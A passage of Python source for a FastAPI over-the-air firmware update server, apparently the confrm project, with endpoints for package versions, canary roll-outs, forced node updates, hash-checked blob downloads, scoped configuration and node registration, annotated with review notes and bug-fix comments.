    Attributes:
        package (str): Package with version to be deleted
        version (str): Version to be deleted
        response (Response): Starlette response object
    """
    (package_doc, status_code, err) = package_exists(package)
    if package_doc is None:
        response.status_code = status_code
        return err
    package_versions = DB.table("package_versions")
    version_entry = get_package_version_by_version_string(package, version)
    if version_entry is None:
        msg = "Package version not found"
        logging.info(msg)
        response.status_code = status.HTTP_404_NOT_FOUND
        return {
            "error": "confrm-020",
            "message": msg,
            "detail": "While attempting to delete a package version the version specified" +
                      " was not found"
        }
    # Remove the DB record, then the backing blob file on disk.
    package_versions.remove(doc_ids=[version_entry.doc_id])
    blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
    file_path = os.path.join(blob_dir, version_entry["blob_id"])
    os.remove(file_path)
    # Check for any hanging canary entries; "Canary Not Found" is benign.
    try:
        remove_canary(package=package)
    except ValueError as err:
        if str(err) != "Canary Not Found":
            raise
    # NOTE(review): when the deleted version was the active one, the
    # package's "current_version" key is left pointing at the removed
    # version -- only a warning is returned.  Confirm downstream handling
    # (check_for_update) tolerates this.
    if "current_version" in package_doc.keys() and package_doc["current_version"] == version:
        msg = "Active version is not set"
        logging.info(msg)
        response.status_code = status.HTTP_200_OK
        return {
            "warning": "confrm-021",
            "message": msg,
            "detail": "While deleting a package version the version specified was set as the"
                      " current active version. The package version was deleted and the active version "
                      f" for package {package} is now not set"
        }
    return {}
@APP.get("/package/", status_code=status.HTTP_200_OK)
async def get_package(name: str, response: Response, lite: bool = False):
    """Returns the package information, including URL for download."""
    (package_doc, status_code, err) = package_exists(name)
    if package_doc is not None:
        # Found: return either the full or reduced (lite) record.
        return format_package_info(package_doc, lite)
    response.status_code = status_code
    return err
@APP.get("/check_for_update/", status_code=status.HTTP_200_OK)
async def check_for_update(package: str, node_id: str, response: Response):
    """Called by node wanting to know if an update is available.

    Will return the most recent package version for the given package name.
    Will check to see if a canary entry has been made for the node, if it is
    then the canary settings will be returned.

    Precedence: per-node force entry, then canary entry, then the package's
    current active version.

    Arguments:
        package (str): Package to check for update for
        node_id (str): Id of the node making the request, or empty
        response (Response): Starlette response object for setting return codes

    Returns:
        HTTP_200_OK / {"current_version": ..., "blob": ...} if found
        HTTP_404_NOT_FOUND / Message header / {} if not found
    """
    packages = DB.table("packages")
    nodes = DB.table("nodes")
    query = Query()
    # Precedence is, node force, package canary then package version
    node_doc = nodes.get(query.node_id == node_id)
    if node_doc and "force" in node_doc.keys():
        version_doc = get_package_version_by_version_string(
            node_doc["force"]["package"],
            node_doc["force"]["version"]
        )
        if version_doc is None:
            # TODO Create test
            # Forced version has since been deleted: self-heal by dropping
            # the force entry and falling through to canary/active logic.
            logging.error("Force version not set, removing force entry...")
            nodes.update(delete("force"), query.node_id == node_id)
        else:
            return {
                "current_version": node_doc["force"]["version"],
                "blob": version_doc["blob_id"],
                "hash": version_doc["hash"],
                "force": True
            }
    # A "*" wildcard canary is claimed by the first node to ask: it is
    # rewritten to a canary entry for this specific node.
    package_canary = get_canary(package=package)
    if package_canary is not None and package_canary["node_id"] == "*":
        set_canary(node_id=node_id, package=package,
                   version=package_canary["version"])
    # Check to see if there is a canary entry for this node
    canary = get_canary(node_id=node_id)
    if canary is not None:
        version_doc = get_package_version_by_version_string(
            canary["package"],
            canary["version"]
        )
        if version_doc is None:
            # TODO: Create test
            # Canary points at a deleted version: drop it and fall through.
            logging.error("Canary version not set, removing canary entry...")
            remove_canary(node_id=node_id)
        else:
            return {
                "current_version": canary["version"],
                "blob": version_doc["blob_id"],
                "hash": version_doc["hash"],
                "force": canary["force"]
            }
    package_doc = packages.get(query.name == package)
    if package_doc is None:
        response.status_code = status.HTTP_404_NOT_FOUND
        return {
            "error": "confrm-000",
            "message": "Package not found",
            "detail": "Package not found"
        }
    if "current_version" in package_doc.keys():
        # NOTE(review): if current_version refers to a version that was
        # deleted (see delete_package_version), version_entry would be None
        # and the subscripts below would raise -- TODO confirm/handle.
        version_entry = get_package_version_by_version_string(
            package,
            package_doc["current_version"])
        return {
            "current_version": package_doc["current_version"],
            "blob": version_entry["blob_id"],
            "hash": version_entry["hash"],
            "force": False
        }
    response.status_code = status.HTTP_404_NOT_FOUND
    return {
        "error": "confrm-011",
        "message": "No versions found for package",
        "detail": "While checking for updates the package was found in the database, " +
                  "however there are no available versions of that package"
    }
@APP.put("/set_active_version/")
async def set_active_version(package: str, version: str):
    """Set the active version via the API.

    Updates the package's ``current_version`` and clears any outstanding
    canary entries for the package (an explicit activation supersedes a
    canary roll-out).

    Arguments:
        package (str): package whose active version is being set
        version (str): dotted "major.minor.revision" version string
    """
    # TODO: Set error codes
    query = Query()
    packages = DB.table("packages")
    package_entry = packages.get(query.name == package)
    if package_entry is None:
        return {"ok": False, "info": "Package does not exist"}
    version_doc = get_package_version_by_version_string(package, version)
    # BUG FIX: TinyDB .get() returns None on a miss; the original
    # `len(version_doc) < 1` raised TypeError instead of reporting
    # the missing version.
    if version_doc is None:
        return {"ok": False, "info": "Specified version does not exist for package"}
    package_entry["current_version"] = version
    result = packages.update(package_entry, query.name == package)
    # Drop any canary entries for the package; absence is not an error.
    try:
        remove_canary(package=package)
    except ValueError as err:
        if str(err) != "Canary Not Found":
            raise
    if len(result) > 0:
        return {"ok": True}
    return {"ok": False}
@APP.put("/node_package/", status_code=status.HTTP_200_OK)
async def node_package(node_id: str, package: str, response: Response, version: str = ""):
    """Force a node to use a particular package.

    When no version is given the package's current active version is used.
    The force entry is cleared by register_node once the node reports it is
    running the forced package.
    """
    (package_doc, status_code, err) = package_exists(package)
    if package_doc is None:
        response.status_code = status_code
        return err
    if not version:
        # BUG FIX: use .get() -- a package that never had an active version
        # has no "current_version" key, so the original subscript raised
        # KeyError instead of returning confrm-008.
        if not package_doc.get("current_version"):
            msg = "Package has no active version"
            logging.info(msg)
            response.status_code = status.HTTP_404_NOT_FOUND
            return {
                "error": "confrm-008",
                "message": msg,
                "detail": "While attempting to set a node to use a particular package the package" +
                          " was found to have no active versions and no specific version was given"
            }
        version = package_doc["current_version"]
    else:
        version_doc = get_package_version_by_version_string(package, version)
        if version_doc is None:
            msg = "Package version not found"
            response.status_code = status.HTTP_404_NOT_FOUND
            return {
                "error": "confrm-002",
                "message": msg,
                "detail": "While attempting to set a node to use a particular package the " +
                          " version given was not found"
            }
    (node_doc, status_code, err) = node_exists(node_id)
    if node_doc is None:
        response.status_code = status_code
        return err
    # Record the forced (package, version) pair on the node document.
    node_doc["force"] = {
        "package": package,
        "version": version
    }
    nodes = DB.table("nodes")
    query = Query()
    nodes.update(node_doc, query.node_id == node_id)
    return {}
@APP.delete("/node_package/", status_code=status.HTTP_200_OK)
async def node_package(node_id: str, response: Response):
    """Delete entry forcing a node to use a particular package."""
    (node_doc, status_code, err) = node_exists(node_id)
    if node_doc is None:
        response.status_code = status_code
        return err
    # Nothing to delete when no force entry was ever set.
    if "force" not in node_doc:
        response.status_code = status.HTTP_404_NOT_FOUND
        return {
            "error": "confrm-007",
            "message": "Node does not have a force package entry",
            "detail": "While attempting to remove a package forcing entry for node" +
                      f" {node_id} no node forcing entry was found"
        }
    query = Query()
    DB.table("nodes").update(delete("force"), query.node_id == node_id)
    return {}
@APP.get("/blob/", status_code=status.HTTP_200_OK)
async def get_blob(package: str, blob: str, response: Response):
    """Serve a stored firmware blob.

    Looks up the version record for (package, blob), decodes the stored
    base64 file and verifies its SHA-256 against the hash recorded at
    upload time before returning the raw bytes.
    """
    query = Query()
    package_versions = DB.table("package_versions")
    (package_doc, status_code, err) = package_exists(package)
    if package_doc is None:
        response.status_code = status_code
        return err
    # BUG FIX: TinyDB conditions must be combined with `&`; the original
    # used Python `and`, which discarded the package-name condition and
    # matched the blob id across all packages.
    version_entry = package_versions.get(
        (query.name == package) &
        (query.blob_id == blob))
    if version_entry is None:
        return {"ok": False, "info": "Specified blob does not exist for package"}
    # Read the file from the data store (stored base64-encoded)
    blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
    with open(os.path.join(blob_dir, blob), "rb") as ptr:
        data = base64.b64decode(ptr.read())
    # Create sha256 of data from store
    _h = SHA256.new()
    _h.update(data)
    # Check hash against original; a mismatch means on-disk corruption.
    if version_entry["hash"] != _h.hexdigest():
        logging.error("Hashes do not match...")
        # NOTE(review): returns None (HTTP 200 with null body) on mismatch,
        # matching prior behaviour -- consider returning an error payload.
        return
    return ConfrmFileResponse(data)
@APP.put("/config/", status_code=status.HTTP_201_CREATED)
async def put_config(type: str, key: str, value: str, response: Response, id: str = ""):
    """Adds new config to the config database

    An existing entry with the same scope (type + key, plus id for
    package/node scopes) is updated in place, otherwise a new document is
    inserted.

    Attributes:
        type (str): One of global, package or node
        id (str): Empty, package name or node_id
        key (str): Key to be stored
        value (str): Value to be stored
    """
    query = Query()
    config = DB.table("config")
    types = ["global", "package", "node"]
    if not type or type not in types:
        msg = "Type cannot be empty and must be a valid type"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-015",
            "message": msg,
            "detail": "While attempting to add a new config the type of config given was empty"
            " or was incorrect."
        }
    pattern = '^[0-9a-zA-Z_-]+$'
    regex = re.compile(pattern)
    if regex.match(key) is None:
        msg = f"Key name does not match pattern {pattern}"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-016",
            "message": msg,
            "detail": "While attempting to add a new config the key given did not match the"
            f" pattern {pattern}"
        }
    # Scoped configs must reference an existing package / node
    if type == "package":
        (package_doc, status_code, err) = package_exists(id)
        if package_doc is None:
            response.status_code = status_code
            return err
    elif type == "node":
        (node_doc, status_code, err) = node_exists(id)
        if node_doc is None:
            response.status_code = status_code
            return err
    # Global configs are matched on type+key only; package/node configs are
    # additionally matched on the owning id.  This replaces three previously
    # duplicated upsert branches.
    scope = (query.key == key) & (query.type == type)
    if type != "global":
        scope = scope & (query.id == id)
    key_doc = config.get(scope)
    if key_doc is not None:
        config.update({"value": value}, doc_ids=[key_doc.doc_id])
        # TODO: Warning for updating, including from and to values
    else:
        config.insert({
            "type": type,
            "id": id,
            "key": key,
            "value": value
        })
    return {}
@APP.get("/config/", status_code=status.HTTP_200_OK)
async def get_config(response: Response, key: str = "", package: str = "", node_id: str = ""):
    """Get configuration value from database

    Lookup precedence is node scope, then package scope, then global scope.
    When no key is given the complete config list is returned, annotated
    with package/node titles and sorted for the UI.

    Attributes:
        key (str): Key to retrieve
        response (Response): Starlette response object
        package (str): Package of requesting node
        node_id (str): node_id of requesting node
    """
    query = Query()
    config = DB.table("config")
    if node_id:
        (doc, status_code, err) = node_exists(node_id)
        if doc is None:
            response.status_code = status_code
            return err
        doc = config.get((query.type == "node") &
                         (query.id == node_id) &
                         (query.key == key))
        if doc is not None:
            return {"value": doc["value"]}
    if package:
        (doc, status_code, err) = package_exists(package)
        if doc is None:
            response.status_code = status_code
            return err
        doc = config.get((query.type == "package") &
                         (query.id == package) &
                         (query.key == key))
        if doc is not None:
            return {"value": doc["value"]}
    if not key:
        # Do deepcopy to save changing database by accident; the loop
        # variable is deliberately NOT called "config" -- the original code
        # rebound the config table variable here
        configs = deepcopy(config.all())
        packages = DB.table("packages")
        nodes = DB.table("nodes")
        for entry in configs:
            if entry["type"] == "package":
                package_doc = packages.get(query.name == entry["id"])
                if package_doc is not None:
                    entry["package_title"] = package_doc["title"]
            elif entry["type"] == "node":
                node_doc = nodes.get(query.node_id == entry["id"])
                if node_doc is not None:
                    entry["node_title"] = node_doc["title"]
        return sort_configs(configs)
    # Must be global...
    doc = config.get((query.type == "global") &
                     (query.key == key))
    if doc is None:
        msg = "Key not found"
        logging.info(msg)
        response.status_code = status.HTTP_404_NOT_FOUND
        return {
            "error": "confrm-012",
            "message": msg,
            # BUG FIX: the second line previously lacked the f prefix, so
            # the literal text "{node_id}" appeared in the response
            "detail": f"Key \"{key}\" was not found for package \"{package}\""
                      f" / node \"{node_id}\""
        }
    return {"value": doc["value"]}
@APP.delete("/config/", status_code=status.HTTP_200_OK)
async def delete_config(key: str, type: str, response: Response, id: str = ""):
    """Delete a config from the database

    Attributes:
        key (str): key to be deleted
        type (str): global/package/node
        id (str): package or node id as per type
        response (Response): Starlette response object
    """
    query = Query()
    config = DB.table("config")
    if type not in ("global", "package", "node"):
        # Unknown scope types fall through silently (matches the original
        # behaviour, which had no else branch)
        return {}
    # Globals are matched on type+key only; package/node entries also match
    # on the owning id.  This replaces three previously duplicated branches.
    condition = (query.key == key) & (query.type == type)
    if type != "global":
        condition = condition & (query.id == id)
    doc = config.get(condition)
    if doc is None:
        msg = "Key not found"
        logging.info(msg)
        response.status_code = status.HTTP_404_NOT_FOUND
        if type == "global":
            detail = f"Key \"{key}\" was not found, unable to delete it"
        else:
            detail = (f"Key \"{key}\" was not found for {type} \"{id}\","
                      " unable to delete it")
        return {
            "error": "confrm-024",
            "message": msg,
            "detail": detail
        }
    config.remove(doc_ids=[doc.doc_id])
    return {}
# ==== confrm/confrm.py ====
"""Main FastAPI Implementation of confrm
Copyright 2020 confrm.io
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Codes:
000 ERROR - - Package not found
001 ERROR - - Node not found
002 ERROR - - Package version not found
003 ERROR PUT /package/ Package already exists
004 ERROR PUT /package/ Package name cannot be empty
005 ERROR PUT /register_node/ Node id is invalid
006 ERROR PUT /package_version/ Version already exists for package
007 ERROR DELETE /node_package/ Node does not have a force package entry
008 ERROR PUT /node_package/ Package has no active version
009
010 ERROR PUT /package/ Package name does not match pattern
011 ERROR GET /check_for_update/ No versions found for package
012 ERROR GET /config/ Key not found
013
014
015
016 ERROR PUT /config/ Key name does not match pattern
017 ERROR POST /package_version/ Version numbers cannot be negative
018 ERROR PUT /node_package/ Package version not found
019
020 ERROR DELETE /package_version/ Package version not found
021 WARNING DELETE /package_version/ Active version not set
022 ERROR PUT /node_title/ Node does not exist
023 ERROR PUT /node_title/ Node title is too long
024 ERROR DELETE /config/ Key not found
025
026 ERROR POST /package_version/ Canary node not found
027
028
029
"""
import base64
import datetime
import logging
import os
import re
import time
import uuid
from copy import deepcopy
import toml
from Crypto.Hash import SHA256
from fastapi import FastAPI, File, Depends, Response, Request, status
from fastapi.responses import FileResponse
from fastapi.staticfiles import StaticFiles
from tinydb import TinyDB, Query
from tinydb.operations import delete
from markupsafe import escape
from pydantic import BaseModel # pylint: disable=E0611
from confrm.responses import ConfrmFileResponse
from confrm.zeroconf import ConfrmZeroconf
# Module-level named logger.  NOTE(review): the handlers below call
# logging.info / logging.error on the root logger directly, so this named
# logger appears unused -- confirm which one is intended.
logger = logging.getLogger('confrm')
logger.setLevel(logging.INFO)
# pydantic data models are used to describe the inputs for the various REST
# API calls, if the calls do not match these names and data-types then the call
# to FastAPI will fail
class Package(BaseModel):  # pylint: disable=R0903
    """Definition of a package.

    Pydantic request model for /package/ calls.
    """
    name: str         # unique identifier; validated against ^[0-9a-zA-Z_-]+$ in put_package
    title: str        # display title; defaults to name when empty (see put_package)
    description: str  # free-text description
    platform: str     # target platform string (e.g. esp32 per register_node docs)
class PackageVersion(BaseModel):  # pylint: disable=R0903
    """Definition of a package version.

    Pydantic request model for /package_version/ calls; the three integer
    parts form the dotted "major.minor.revision" version string.
    """
    name: str      # name of the package this version belongs to
    major: int     # must be >= 0 (validated in add_package_version)
    minor: int     # must be >= 0
    revision: int  # must be >= 0
APP = FastAPI()  # application instance all routes below attach to
CONFIG = None  # parsed toml configuration; populated by do_config()
DB = None  # TinyDB handle; populated by do_config()
ZEROCONF = ConfrmZeroconf()  # zeroconf advertiser; closed in shutdown_event
def do_config():
    """Load configuration and initialise module-level state.

    Reads the toml file named by the CONFRM_CONFIG environment variable,
    opens the TinyDB database inside the configured data directory and
    makes sure the blob folder exists.

    Raises:
        ValueError: when CONFRM_CONFIG is unset or names a missing file
    """
    global CONFIG, DB  # pylint: disable=W0603
    config_file = os.environ.get("CONFRM_CONFIG")
    if config_file is None:
        msg = "CONFRM_CONFIG not set in os.environ"
        logging.error(msg)
        raise ValueError(msg)
    if not os.path.isfile(config_file):
        msg = f"Config file {config_file} does not exist"
        logging.error(msg)
        raise ValueError(msg)
    CONFIG = toml.load(config_file)
    # Open (or create) the database inside the configured data store
    DB = TinyDB(os.path.join(CONFIG["storage"]["data_dir"], "confrm_db.json"))
    # Ensure the blob folder exists alongside the database file
    blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
    if not os.path.isdir(blob_dir):
        os.mkdir(blob_dir)
def get_package_versions(name: str, package: dict = None):
    """Handles the version ordering logic

    Versions are sorted to be in descending order, with the currently
    active version at the top of the list (position 0)

    Attributes:
        name (str): package name string
        package (dict): [Optional] package dict, saves looking up the entry again
    """
    query = Query()
    if package is None:
        # BUG FIX: this previously used .search(), which returns a *list*,
        # while the code below expects a single document (it calls
        # package.keys()); .get() returns one document or None
        package = DB.table("packages").get(query.name == name)
    package_versions = DB.table("package_versions")
    versions_raw = package_versions.search(query.name == name)
    versions = []
    current_version = None
    for entry in versions_raw:
        # Upload dates <= 0 mean the date was never recorded
        if entry["date"] <= 0:
            date_str = "Unknown"
        else:
            date_str = datetime.datetime.fromtimestamp(entry["date"])
        version_str = f'{entry["major"]}.{entry["minor"]}.{entry["revision"]}'
        entry_info = {
            "number": version_str,
            "date": date_str,
            "blob": entry["blob_id"]
        }
        # Guard against a missing package document (previously crashed)
        if package is not None and \
                package.get("current_version") == version_str:
            current_version = entry_info
        else:
            versions.append(entry_info)
    # Natural sort on the dotted version number, newest first
    versions = sorted(
        versions,
        key=lambda x: [int(i) if i.isdigit()
                       else i for i in x["number"].split('.')],
        reverse=True
    )
    if current_version is not None:
        versions.insert(0, current_version)
    return versions
def format_package_info(package: dict, lite: bool = False):
    """Formats data in to correct dict form

    Can generate long form (for UI) or short form / lite (for nodes)

    Attributes:
        package (dict): package dict from DB
        lite (bool): if true a reduced response is generated
    """
    current_version = ""
    if "current_version" in package.keys():
        current_version = package["current_version"]
    # Minimal data for lite implementation
    if lite:
        return {
            "current_version": current_version,
        }
    versions = get_package_versions(package["name"], package)
    latest_version = current_version
    # BUG FIX: versions with an unrecorded upload date carry the string
    # "Unknown" in their "date" field (see get_package_versions); max()
    # over mixed str/datetime values raised TypeError, so restrict the
    # search to entries with a real datetime
    dated = [v for v in versions if not isinstance(v["date"], str)]
    if dated:
        latest_version = max(dated, key=lambda v: v["date"])["number"]
    return {
        "name": package["name"],
        "title": package["title"],
        "description": package["description"],
        "platform": package["platform"],
        "current_version": current_version,
        "latest_version": latest_version,
        "versions": versions
    }
def get_package_version_by_version_string(package_name: str, version: str):
    """Look up a version document from a dotted "major.minor.revision" string.

    Returns the TinyDB document, or None when no matching version exists.
    """
    parts = version.split(".")
    major, minor, revision = int(parts[0]), int(parts[1]), int(parts[2])
    query = Query()
    return DB.table("package_versions").get(
        (query.name == package_name) &
        (query.major == major) &
        (query.minor == minor) &
        (query.revision == revision))
def sort_configs(configs):  # pylint: disable=R0912
    """Sort configs by global/package/node, then by package name, then by node name

    Attributes:
        configs (list): List of config dicts
    """
    ordered = []
    # Unique keys, preserving first-seen order for case-insensitive ties
    unique_keys = []
    for entry in configs:
        if entry["key"] not in unique_keys:
            unique_keys.append(entry["key"])
    for key in sorted(unique_keys, key=str.lower):
        with_key = [entry for entry in configs if entry["key"] == key]
        # Globals first, in their original order
        ordered.extend(entry for entry in with_key if entry["type"] == "global")
        # Then package-scoped, then node-scoped entries, each group sorted
        # case-insensitively by id; first matching entry wins per id
        for scope in ("package", "node"):
            scoped_ids = sorted((entry["id"] for entry in with_key
                                 if entry["type"] == scope), key=str.lower)
            for scoped_id in scoped_ids:
                for entry in with_key:
                    if entry["type"] == scope and entry["id"] == scoped_id:
                        ordered.append(entry)
                        break
    return ordered
def set_canary(node_id: str, package: str, version: str):
    """Creates an entry in the canary table for this node.

    If the node already exists then the previous entry will be deleted, and if an entry
    for the package already exists then that will be deleted.
    There can only be one entry per package and per node.

    Attributes:
        node_id (str): Node_id to be added
        package (str): Package name which the node will be set to
        version (str): Version of package the node will be set to
    """
    query = Query()
    canaries = DB.table("canary")
    # Check for existing node entry and delete if it exists.
    # BUG FIX: this previously called canaries.remote(), which is not a
    # TinyDB method, raising AttributeError whenever the node already had
    # a canary entry
    for canary in canaries.search(query.node_id == node_id):
        canaries.remove(doc_ids=[canary.doc_id])
    # Check for existing entries for the given package, delete if exists
    for package_doc in canaries.search(query.package == package):
        canaries.remove(doc_ids=[package_doc.doc_id])
    # Insert new entry, force is set to True, once the node has been updated
    canaries.insert({
        "package": package,
        "version": version,
        "node_id": node_id,
        "force": True
    })
def remove_canary(package: str = "", node_id: str = ""):
    """Removes the given package or node canary entry

    Exceptions:
        ValueError("Canary Not Found")

    Attributes:
        node_id (str): Node_id to be added
        package (str): Package name which the node will be set to
    """
    if not package and not node_id:
        raise ValueError("Canary Not Found")
    query = Query()
    canaries = DB.table("canary")
    removed = 0
    if package:
        for doc in canaries.search(query.package == package):
            canaries.remove(doc_ids=[doc.doc_id])
            removed += 1
    if node_id:
        for doc in canaries.search(query.node_id == node_id):
            canaries.remove(doc_ids=[doc.doc_id])
            removed += 1
    # Raise when neither filter matched anything
    if removed == 0:
        raise ValueError("Canary Not Found")
def get_canary(package: str = "", node_id: str = ""):
    """Checks if a canary exists for given package or node_id

    Exceptions:
        ValueError("Input Not Set")

    Attributes:
        node_id (str): Node_id to be added
        package (str): Package name which the node will be set to

    Returns:
        None: No entry found
        TinyDB Document: Found entry
    """
    if not package and not node_id:
        raise ValueError("Input Not Set")
    query = Query()
    canaries = DB.table("canary")
    # Package lookup takes precedence; fall back to the node lookup
    found = canaries.get(query.package == package) if package else None
    if found is None and node_id:
        found = canaries.get(query.node_id == node_id)
    return found
def package_exists(package: str):
    """Check whether a package exists.

    Returns a (package_doc, status, error_dict) tuple: the document plus
    (None, None) on success, or (None, 404, error payload) when missing.

    Attributes:
        package (str): Package to search for
    """
    query = Query()
    doc = DB.table("packages").get(query.name == package)
    if doc is not None:
        return (doc, None, None)
    return (None, status.HTTP_404_NOT_FOUND, {
        "error": "confrm-000",
        "message": "Package not found",
        "detail": "The package specified was not found"
    })
def node_exists(node_id: str):
    """Check whether a node exists.

    Returns a (node_doc, status, error_dict) tuple: the document plus
    (None, None) on success, or (None, 404, error payload) when missing.

    Attributes:
        node_id (str): Node id to search for
    """
    query = Query()
    doc = DB.table("nodes").get(query.node_id == node_id)
    if doc is not None:
        return (doc, None, None)
    return (None, status.HTTP_404_NOT_FOUND, {
        "error": "confrm-001",
        "message": "Node not found",
        "detail": "The node specified was not found"
    })
# Files server in /static will point to ./dashboard (with respect to the running
# script) -- the bundled dashboard UI assets are served directly by Starlette
APP.mount("/static",
          StaticFiles(directory=os.path.join(os.path.dirname(__file__), "dashboard")
                      ),
          name="home")
@APP.on_event("startup")
async def startup_event():
    """Is called on application startup; loads config and opens the database."""
    do_config()
@APP.on_event("shutdown")
async def shutdown_event():
    """Is called on application shutdown; stops the zeroconf advertiser."""
    ZEROCONF.close()
@APP.get("/")
async def index():
    """Serve the dashboard's index page."""
    dashboard_index = os.path.join(
        os.path.dirname(__file__), "dashboard/index.html")
    return FileResponse(dashboard_index)
@APP.get("/info/")
async def info():
    """Return basic counts (packages, nodes) for the UI header."""
    return {
        "packages": len(DB.table("packages")),
        "nodes": len(DB.table("nodes")),
    }
@APP.get("/time/")
async def get_time():
    """Returns time of day from server as unix epoch time"""
    # Lazily initialise if the startup hook has not run yet.
    # NOTE(review): the config is not used to compute the time -- presumably
    # this doubles as a readiness check; confirm intent
    if CONFIG is None:
        do_config()
    return {"time": round(time.time())}
@APP.get("/canary/", status_code=status.HTTP_200_OK)
async def get_canary_api(response: Response, node_id: str = ""):
    """Helper to read back the canary status for a node

    Attributes:
        node_id (str): The node id to check against
        response (Response): Starlette response object for setting return codes
    """
    canary = get_canary(node_id=node_id)
    if canary is None:
        msg = "Canary entry not found"
        logging.info(msg)
        response.status_code = status.HTTP_404_NOT_FOUND
        # NOTE(review): "confrm-022" is listed in the module header as the
        # /node_title/ "Node does not exist" error -- looks like a reused
        # code; confirm before clients match on it
        return {
            "error": "confrm-022",
            "message": msg,
            "detail": msg
        }
    return canary
@APP.put("/register_node/", status_code=status.HTTP_200_OK)
async def register_node(  # pylint: disable=R0913
        node_id: str,
        package: str,
        version: str,
        description: str,
        platform: str,
        request: Request,
        response: Response):
    """Registers a node to the server

    Attributes:
        node_id (str): The node id, must be unique, MAC addresses work well
        package (str): Package installed on the node
        version (str): Version string of currently running package
        description (str): Description of package
        platform: (str): Platform type (i.e. esp32)
        request (Request): Starlette request object for getting client information
        response (Response): Starlette response object for setting return codes

    Returns:
        HTTP_200_OK
        HTTP_404_NOT_FOUND
    """
    query = Query()
    nodes = DB.table("nodes")
    # Make sure input is sane before it is stored / rendered in the UI
    node_id = escape(node_id)
    package = escape(package)
    version = escape(version)
    description = escape(description)
    platform = escape(platform)
    # Asterisk is not allowed: "*" is reserved as the canary-next wildcard
    # node id (see set_canary / add_package_version)
    if node_id == "*":
        msg = "Node id is invalid"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-005",
            "message": msg,
            "detail": "A node attempted to register with an invalid node_id"
        }
    node_doc = nodes.get(query.node_id == node_id)
    if node_doc is None:
        # First contact from this node -- create a fresh record; the title
        # defaults to the node id until changed via /node_title/
        entry = {
            "node_id": node_id,
            "title": node_id,
            "package": package,
            "version": version,
            "description": description,
            "platform": platform,
            "last_updated": -1,
            "last_seen": round(time.time()),
            "ip_address": request.client.host
        }
        nodes.insert(entry)
        return {}
    # Update the package entry based on package name change, new version of a package
    # and register this as the last update time
    if node_doc["package"] != package:  # Package changed -> update time unknown
        node_doc["package"] = package
        node_doc["version"] = version
        node_doc["last_updated"] = -1
    elif node_doc["version"] != version:  # Version of package changed
        node_doc["version"] = version
        node_doc["last_updated"] = round(time.time())
    node_doc["last_seen"] = round(time.time())
    node_doc["package"] = package
    node_doc["description"] = description
    node_doc["platform"] = platform
    node_doc["ip_address"] = request.client.host
    nodes.update(node_doc, query.node_id == node_id)
    # Check if force package change: clear the force entry once the node
    # reports it is running the forced package
    if "force" in node_doc.keys() and node_doc["package"] == node_doc["force"]["package"]:
        nodes.update(delete("force"), query.node_id == node_id)
    # Check to see if a canary: once the canary node has checked in, stop
    # forcing the canary version on it
    canary = get_canary(node_id=node_id)
    if canary is not None:
        canaries = DB.table("canary")
        canary["force"] = False
        canaries.update(canary, query.node_id == node_id)
    return {}
@APP.get("/nodes/", status_code=status.HTTP_200_OK)
async def get_nodes(package: str = "", node_id: str = ""):
    """Return registered nodes.

    Without filters every node is returned.  Filtering by package restricts
    the list to nodes running that package; filtering by node_id alone
    returns the single matching node document instead of a list.

    Attributes:
        package (str): restrict results to nodes running this package
        node_id (str): restrict results to this node id
    """
    query = Query()
    nodes = DB.table("nodes")
    if package and node_id:
        matched = nodes.search((query.package == package) &
                               (query.node_id == node_id))
    elif package:
        matched = nodes.search(query.package == package)
    elif node_id:
        matched = nodes.search(query.node_id == node_id)
    else:
        matched = nodes.all()
    if not matched:
        return {}
    # Deep-copy so the display formatting below never leaks back into the
    # database documents
    matched = deepcopy(matched)

    def _display_time(stamp):
        """Render a unix timestamp for the UI; -1 means never/unknown."""
        if stamp == -1:
            return "Unknown"
        return f"{datetime.datetime.fromtimestamp(stamp):%Y-%m-%d %H:%M:%S}"

    for node in matched:
        node["last_updated"] = _display_time(node["last_updated"])
        node["last_seen"] = _display_time(node["last_seen"])
    if not package and node_id:
        return matched[0]
    return matched
@APP.put("/node_title/", status_code=status.HTTP_200_OK)
async def put_node_title(response: Response, node_id: str = "", title: str = ""):
    """Set the display title for a node.

    Attributes:
        node_id (str): id of the node to retitle
        title (str): new title (escaped; at most 80 characters)
    """
    query = Query()
    nodes = DB.table("nodes")
    if nodes.get(query.node_id == node_id) is None:
        msg = "Node does not exist"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-022",
            "message": msg,
            "detail": "While attempting to set the title of a node, the node id given was not"
            " found"
        }
    # Sanitise before checking length -- escaping may lengthen the string
    title = escape(title)
    if len(title) > 80:
        msg = "Node title is too long"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-023",
            "message": msg,
            "detail": "While attempting to set the title of a node, the title was too long"
        }
    nodes.update({"title": title}, query.node_id == node_id)
    return {}
@APP.get("/packages/")
async def package_list():
    """Get package list and process for displaying on the UI """
    if CONFIG is None:
        do_config()
    # Collapse the raw package records into a name-keyed dict of
    # display-ready entries (unique names, version lists attached)
    return {
        entry["name"]: format_package_info(entry)
        for entry in DB.table("packages")
    }
@APP.put("/package/", status_code=status.HTTP_201_CREATED)
async def put_package(response: Response, package: Package = Depends()):
    """Add package description

    Attributes:
        package (Package): Package description to be added
    """
    # Update storage record to include the local information
    package_dict = package.__dict__
    # Escape the strings so stored values are safe to render in the UI
    for key in package_dict.keys():
        if isinstance(package_dict[key], str):
            package_dict[key] = escape(package_dict[key])
    if not package.name:
        msg = "Package name cannot be empty"
        logging.info(msg)
        response.status_code = status.HTTP_400_BAD_REQUEST
        return {
            "error": "confrm-004",
            "message": msg,
            "detail": "While attempting to add a new package the package name was set to \"\""
        }
    # Names are restricted to URL/path-safe characters
    pattern = '^[0-9a-zA-Z_-]+$'
    regex = re.compile(pattern)
    if regex.match(package_dict["name"]) is None:
